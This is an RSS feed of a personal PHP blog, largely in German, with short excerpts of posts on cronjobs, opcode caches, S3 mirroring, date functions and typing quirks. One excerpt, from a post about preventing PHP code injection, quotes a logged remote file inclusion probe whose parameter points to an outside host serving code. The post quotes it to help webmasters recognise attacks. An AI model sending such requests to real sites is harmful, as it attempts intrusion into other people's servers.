<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Dominik Deobald &#187; PHP</title>
	<atom:link href="http://blogs.interdose.com/dominik/tag/php/feed/" rel="self" type="application/rss+xml" />
	<link>http://blogs.interdose.com/dominik</link>
	<description>Interdose Ltd. &#38; Co KG.</description>
	<lastBuildDate>Tue, 29 Jun 2010 11:55:35 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='blogs.interdose.com' port='80' path='/dominik/?rsscloud=notify' registerProcedure='' protocol='http-post' />
		<item>
		<title>Self-Generating Class Objetcs in PHP</title>
		<link>http://blogs.interdose.com/dominik/2010/03/03/selfgenerating-class-objetcs-php/</link>
		<comments>http://blogs.interdose.com/dominik/2010/03/03/selfgenerating-class-objetcs-php/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 15:30:47 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[class]]></category>
		<category><![CDATA[object]]></category>
		<category><![CDATA[PHP 5.2]]></category>
		<category><![CDATA[PHP 5.2.6]]></category>
		<category><![CDATA[property]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/?p=112</guid>
		<description><![CDATA[<p>I have a directory on the webserver in my development environment where I do little experiments. I try out stuff that I cant figure out by looking into the PHP documentation &#8211; either because I can&#8217;t find the right place to look or because it&#8217;s just not explained.</p>
<p><a href="http://blogs.interdose.com/dominik/2010/03/03/selfgenerating-class-objetcs-php/" class="more-link">Read more on Self-Generating Class Objetcs in PHP&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2010. &#124;
<a href="http://blogs.interdose.com/dominik/2010/03/03/selfgenerating-class-objetcs-php/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2010/03/03/selfgenerating-class-objetcs-php/#comments">No comment</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2010/03/03/selfgenerating-class-objetcs-php/&#38;title=Self-Generating Class Objetcs in PHP">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/class/" rel="tag">class</a>, <a href="http://blogs.interdose.com/dominik/tag/object/" rel="tag">object</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/php-5-2/" rel="tag">PHP 5.2</a>, <a href="http://blogs.interdose.com/dominik/tag/php-5-2-6/" rel="tag">PHP 5.2.6</a>, <a href="http://blogs.interdose.com/dominik/tag/property/" rel="tag">property</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2010/03/03/selfgenerating-class-objetcs-php/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>wget und administrative cronjobs</title>
		<link>http://blogs.interdose.com/dominik/2009/10/28/wget-und-administrative-cronjobs/</link>
		<comments>http://blogs.interdose.com/dominik/2009/10/28/wget-und-administrative-cronjobs/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 15:09:58 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[Webserver]]></category>
		<category><![CDATA[cronjob]]></category>
		<category><![CDATA[curl]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[slow]]></category>
		<category><![CDATA[wget]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/?p=99</guid>
		<description><![CDATA[<p>Wer &#8211; so wie ich &#8211; gerne seine CRON-Tabelle mit Hintergrund-Jobs füllt, die der Server beispielsweise ein mal pro Tag erledigen soll, der sollte gerade in der Kombination <i>wget</i> und <i>PHP-Script</i> etwas aufpassen. Es gibt da einen Fallstrick, der nicht auf den ersten Blick sichtbar ist:</p>
<p><a href="http://blogs.interdose.com/dominik/2009/10/28/wget-und-administrative-cronjobs/" class="more-link">Read more on wget und administrative cronjobs&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2009. &#124;
<a href="http://blogs.interdose.com/dominik/2009/10/28/wget-und-administrative-cronjobs/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2009/10/28/wget-und-administrative-cronjobs/#comments">No comment</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2009/10/28/wget-und-administrative-cronjobs/&#38;title=wget und administrative cronjobs">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/cronjob/" rel="tag">cronjob</a>, <a href="http://blogs.interdose.com/dominik/tag/curl/" rel="tag">curl</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/server/" rel="tag">server</a>, <a href="http://blogs.interdose.com/dominik/tag/slow/" rel="tag">slow</a>, <a href="http://blogs.interdose.com/dominik/tag/wget/" rel="tag">wget</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2009/10/28/wget-und-administrative-cronjobs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Amazon CloudForce als CDN verwenden</title>
		<link>http://blogs.interdose.com/dominik/2008/12/28/amazon-cloudforce-als-cdn-verwenden/</link>
		<comments>http://blogs.interdose.com/dominik/2008/12/28/amazon-cloudforce-als-cdn-verwenden/#comments</comments>
		<pubDate>Sun, 28 Dec 2008 16:38:04 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[S3 Mirror]]></category>
		<category><![CDATA[amazon]]></category>
		<category><![CDATA[cloudforce]]></category>
		<category><![CDATA[expires]]></category>
		<category><![CDATA[header]]></category>
		<category><![CDATA[mirror]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[s3]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/?p=65</guid>
		<description><![CDATA[<p>Ich habe gerade ein kleines PHP Script geschrieben, mit dem man ganz einfach ein lokales Verzeichnis (inclusive Unterverzeichnisse) auf einem Webserver in ein Amazon S3 Bucket spiegeln kann &#8211; beispielsweise, um diese dann für CloudForce zu verwenden.</p>
<p><a href="http://blogs.interdose.com/dominik/2008/12/28/amazon-cloudforce-als-cdn-verwenden/" class="more-link">Read more on Amazon CloudForce als CDN verwenden&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2008. &#124;
<a href="http://blogs.interdose.com/dominik/2008/12/28/amazon-cloudforce-als-cdn-verwenden/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2008/12/28/amazon-cloudforce-als-cdn-verwenden/#comments">No comment</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2008/12/28/amazon-cloudforce-als-cdn-verwenden/&#38;title=Amazon CloudForce als CDN verwenden">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/amazon/" rel="tag">amazon</a>, <a href="http://blogs.interdose.com/dominik/tag/cloudforce/" rel="tag">cloudforce</a>, <a href="http://blogs.interdose.com/dominik/tag/expires/" rel="tag">expires</a>, <a href="http://blogs.interdose.com/dominik/tag/header/" rel="tag">header</a>, <a href="http://blogs.interdose.com/dominik/tag/mirror/" rel="tag">mirror</a>, <a href="http://blogs.interdose.com/dominik/tag/open-source/" rel="tag">open source</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/s3/" rel="tag">s3</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2008/12/28/amazon-cloudforce-als-cdn-verwenden/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TO_DAYS und FROM_DAYS in PHP</title>
		<link>http://blogs.interdose.com/dominik/2008/07/26/to_days-und-from_days-in-php/</link>
		<comments>http://blogs.interdose.com/dominik/2008/07/26/to_days-und-from_days-in-php/#comments</comments>
		<pubDate>Sat, 26 Jul 2008 20:35:53 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[MySQL]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[from_days]]></category>
		<category><![CDATA[to_days]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/?p=31</guid>
		<description><![CDATA[<p>Ich war gerade mal so frei, eine einfache Implementierung der beiden MySQL-Funktionen <a href="http://dev.mysql.com/doc/refman/5.1/en/date-and-time-functions.html#function_to-days" target="_blank">TO_DAYS</a> und <a href="http://dev.mysql.com/doc/refman/5.1/en/date-and-time-functions.html#function_from-days" target="_blank">FROM_DAYS</a> in PHP zu basteln. Die Funktionen sind weder vollständig noch sonderlich elegant programmiert, aber sie sind mit den Werten aus MySQL kompatibel, d.h. man kann aus den Zahlen, die MySQL liefert in PHP ein Datum erstellen &#8211; und umgekehrt.</p>
<p><a href="http://blogs.interdose.com/dominik/2008/07/26/to_days-und-from_days-in-php/" class="more-link">Read more on TO_DAYS und FROM_DAYS in PHP&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2008. &#124;
<a href="http://blogs.interdose.com/dominik/2008/07/26/to_days-und-from_days-in-php/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2008/07/26/to_days-und-from_days-in-php/#comments">One comment</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2008/07/26/to_days-und-from_days-in-php/&#38;title=TO_DAYS und FROM_DAYS in PHP">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/from_days/" rel="tag">from_days</a>, <a href="http://blogs.interdose.com/dominik/tag/mysql/" rel="tag">MySQL</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/to_days/" rel="tag">to_days</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2008/07/26/to_days-und-from_days-in-php/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Abstürze durch PHP OpCode Caches</title>
		<link>http://blogs.interdose.com/dominik/2008/04/24/absturze-durch-php-opcode-caches/</link>
		<comments>http://blogs.interdose.com/dominik/2008/04/24/absturze-durch-php-opcode-caches/#comments</comments>
		<pubDate>Thu, 24 Apr 2008 09:51:16 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Performance Tuning]]></category>
		<category><![CDATA[absturz]]></category>
		<category><![CDATA[eaccelerator]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[segfault]]></category>
		<category><![CDATA[Webserver]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/?p=28</guid>
		<description><![CDATA[<p>Thomas Kruse hat auf seinem Blog <a href="http://everflux.de/eaccelerator-vs-xcache-caches-fur-php-536/" target="_blank">everflux</a> seine Erfahrungen zur Stabilität mit den diversen OpCode Caches veröffentlicht &#8211; mit einem ziemlich eindeutigen Ergebnis: Sie sind es allesamt nicht. Abstürze gehören wohl zur Regel.</p>
<p><a href="http://blogs.interdose.com/dominik/2008/04/24/absturze-durch-php-opcode-caches/" class="more-link">Read more on Abstürze durch PHP OpCode Caches&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2008. &#124;
<a href="http://blogs.interdose.com/dominik/2008/04/24/absturze-durch-php-opcode-caches/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2008/04/24/absturze-durch-php-opcode-caches/#comments">One comment</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2008/04/24/absturze-durch-php-opcode-caches/&#38;title=Abstürze durch PHP OpCode Caches">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/absturz/" rel="tag">absturz</a>, <a href="http://blogs.interdose.com/dominik/tag/eaccelerator/" rel="tag">eaccelerator</a>, <a href="http://blogs.interdose.com/dominik/tag/performance/" rel="tag">performance</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/segfault/" rel="tag">segfault</a>, <a href="http://blogs.interdose.com/dominik/tag/webserver/" rel="tag">Webserver</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2008/04/24/absturze-durch-php-opcode-caches/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Benchmarking PHP: eAccelerator und andere OpCode Caches</title>
		<link>http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/</link>
		<comments>http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/#comments</comments>
		<pubDate>Fri, 11 Apr 2008 15:20:21 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Performance Tuning]]></category>
		<category><![CDATA[alternative php cache]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[apc]]></category>
		<category><![CDATA[benchmark]]></category>
		<category><![CDATA[eaccelerator]]></category>
		<category><![CDATA[opcode cache]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[speed]]></category>
		<category><![CDATA[Webserver]]></category>
		<category><![CDATA[xcache]]></category>
		<category><![CDATA[zend optimizer]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/?p=22</guid>
		<description><![CDATA[<p>Die Aufgabenstellung: Die Applikationen aus unserem Hause sollen so stabil und leistungsfähig laufen wie möglich. Ein wichtiger Bestandteil der Applikations-Infrastruktur stellen in unserem Bereich die Webserver dar, die PHP-Unterstützung mitbringen müssen.</p>
<p><a href="http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/" class="more-link">Read more on Benchmarking PHP: eAccelerator und andere OpCode Caches&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2008. &#124;
<a href="http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/#comments">7 comments</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/&#38;title=Benchmarking PHP: eAccelerator und andere OpCode Caches">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/alternative-php-cache/" rel="tag">alternative php cache</a>, <a href="http://blogs.interdose.com/dominik/tag/apache/" rel="tag">Apache</a>, <a href="http://blogs.interdose.com/dominik/tag/apc/" rel="tag">apc</a>, <a href="http://blogs.interdose.com/dominik/tag/benchmark/" rel="tag">benchmark</a>, <a href="http://blogs.interdose.com/dominik/tag/eaccelerator/" rel="tag">eaccelerator</a>, <a href="http://blogs.interdose.com/dominik/tag/opcode-cache/" rel="tag">opcode cache</a>, <a href="http://blogs.interdose.com/dominik/tag/performance/" rel="tag">performance</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/speed/" rel="tag">speed</a>, <a href="http://blogs.interdose.com/dominik/tag/webserver/" rel="tag">Webserver</a>, <a href="http://blogs.interdose.com/dominik/tag/xcache/" rel="tag">xcache</a>, <a href="http://blogs.interdose.com/dominik/tag/zend-optimizer/" rel="tag">zend optimizer</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Sicherer PHP-Code: PHP Code Injection verhindern</title>
		<link>http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/</link>
		<comments>http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/#comments</comments>
		<pubDate>Thu, 20 Mar 2008 16:30:21 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[code injection]]></category>
		<category><![CDATA[programmierung]]></category>
		<category><![CDATA[sicherheit]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/</guid>
		<description><![CDATA[<p>Wer ab und an mal einen Blick in seine Webserver-Logdateien wirft (was man als ernsthafter Webmaster regelmäßig tun sollte), der wird vermutlich früher oder später über derartige, seltsame Seitenaufrufe stolpern:</p>
<ul>
<li>&#8220;GET /fooscript.php?w=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F HTTP/1.0&#8243;</li>
</ul>
<p><a href="http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/" class="more-link">Read more on Sicherer PHP-Code: PHP Code Injection verhindern&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2008. &#124;
<a href="http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/#comments">One comment</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/&#38;title=Sicherer PHP-Code: PHP Code Injection verhindern">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/code-injection/" rel="tag">code injection</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/programmierung/" rel="tag">programmierung</a>, <a href="http://blogs.interdose.com/dominik/tag/security/" rel="tag">Security</a>, <a href="http://blogs.interdose.com/dominik/tag/sicherheit/" rel="tag">sicherheit</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2008/03/20/sicherer-php-code-php-code-injection-verhindern/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Untypisierte Variablen und logische Verknüpfungen</title>
		<link>http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/</link>
		<comments>http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/#comments</comments>
		<pubDate>Mon, 03 Mar 2008 15:11:59 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[logische operatoren]]></category>
		<category><![CDATA[typisierung]]></category>
		<category><![CDATA[variablen]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/</guid>
		<description><![CDATA[<p>Ich habe <a href="http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/">mal wieder</a> ein klassisches Beispiel für Probleme, die Auftreten können, wenn Variablen in einer Programmiersprache nicht sauber <a href="http://de.wikipedia.org/wiki/Typisierung_%28Informatik%29">typisiert</a> sind:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$x</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">255</span><span style="color: #339933;">;</span> <span style="color: #000088;">$y</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">96</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">echo</span> <span style="color: #000088;">$x</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">' OR '</span><span style="color: #339933;">,</span> <span style="color: #000088;">$y</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">' =&#62; '</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$x</span> <span style="color: #339933;">&#124;</span> <span style="color: #000088;">$y</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>

<p><a href="http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/" class="more-link">Read more on Untypisierte Variablen und logische Verknüpfungen&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2008. &#124;
<a href="http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/#comments">No comment</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/&#38;title=Untypisierte Variablen und logische Verknüpfungen">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/logische-operatoren/" rel="tag">logische operatoren</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/typisierung/" rel="tag">typisierung</a>, <a href="http://blogs.interdose.com/dominik/tag/variablen/" rel="tag">variablen</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2008/03/03/untypisierte-variablen-und-logische-verknupfungen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Null und nichts in PHP</title>
		<link>http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/</link>
		<comments>http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/#comments</comments>
		<pubDate>Wed, 12 Dec 2007 20:05:07 +0000</pubDate>
		<dc:creator>Dominik Deobald</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[leer]]></category>
		<category><![CDATA[string]]></category>
		<category><![CDATA[variablen]]></category>

		<guid isPermaLink="false">http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/</guid>
		<description><![CDATA[<p>Vielleicht interessant für den einen oder anderen, dem dadurch die eine oder andere Minute Debuggen erspart bleibt&#8230;</p>
<p>Ich bin gerade einem seltsamen Phänomen in einem meiner Scripte nachgegangen. Eine meiner Variablen schien einfach zu verschwinden, dabei sollten nur die Variablen ohne Inhalt ignoriert werden.</p>
<p><a href="http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/" class="more-link">Read more on Null und nichts in PHP&#8230;</a></p>
<hr />
<p><small>&#169; BlaM for <a href="http://blogs.interdose.com/dominik">Dominik Deobald</a>, 2007. &#124;
<a href="http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/">Permalink</a> &#124;
<a href="http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/#comments">2 comments</a> &#124;
Add to
<a href="http://del.icio.us/post?url=http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/&#38;title=Null und nichts in PHP">del.icio.us</a>
<br/>
Post tags: <a href="http://blogs.interdose.com/dominik/tag/leer/" rel="tag">leer</a>, <a href="http://blogs.interdose.com/dominik/tag/php/" rel="tag">PHP</a>, <a href="http://blogs.interdose.com/dominik/tag/string/" rel="tag">string</a>, <a href="http://blogs.interdose.com/dominik/tag/variablen/" rel="tag">variablen</a><br/>
</small></p>
<p><small>Feed enhanced by <a href='http://planetozh.com/blog/my-projects/wordpress-plugin-better-feed-rss/'>Better Feed</a> from  <a href='http://planetozh.com/blog/'>Ozh</a></small></p>
]]></description>
		<wfw:commentRss>http://blogs.interdose.com/dominik/2007/12/12/null-und-nichts-in-php/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
